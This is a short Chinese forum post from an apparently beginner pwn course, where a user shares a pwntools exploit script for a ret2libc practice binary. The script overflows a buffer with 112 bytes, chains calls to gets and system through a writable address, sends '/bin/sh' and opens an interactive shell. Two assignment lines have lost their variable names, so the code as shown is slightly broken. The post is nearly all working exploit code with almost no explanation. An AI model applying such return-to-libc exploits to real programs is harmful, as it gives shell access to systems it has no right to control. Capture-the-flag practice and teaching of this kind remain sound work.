首頁
社區(qū)
課程
招聘
經(jīng)過兩個小時的調(diào)試。。我終于找到了不需要 pop ;ret的方法,少了個局限性。

提問者:
hack_xolin 2021-4-11
經(jīng)過兩個小時的調(diào)試。。我終于找到了不需要 pop ;ret的方法,少了個局限性。
EXP如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from  pwn  import  *
 
context.log_level  =  "debug"
=  process("./ret2libc2_last")
=  ELF("./ret2libc2_last")
 
systemAddr  =  e.symbols["system"]
getsAddr  =  e.plt["gets"]
offset  =  112
binAddr  =  0x804b000  -  0x10
 
payload  =  offset  *  "A"  +  p32(getsAddr)  +  p32(systemAddr)  +  p32(binAddr)  +  p32(binAddr)
pause()
p.sendlineafter("What  do  you  think  ?",  payload)
 
p.sendline("/bin/sh\x00")
p.interactive()
收藏
0條回答
零基礎(chǔ)入門pwn
  提問次數(shù)     36 個
《零基礎(chǔ)入門pwn》,短時間內(nèi)踏入漏洞利用的大門,快速成為一名合格的pwn題選手
0
我的提問
0
我的回答
0
學(xué)習(xí)收益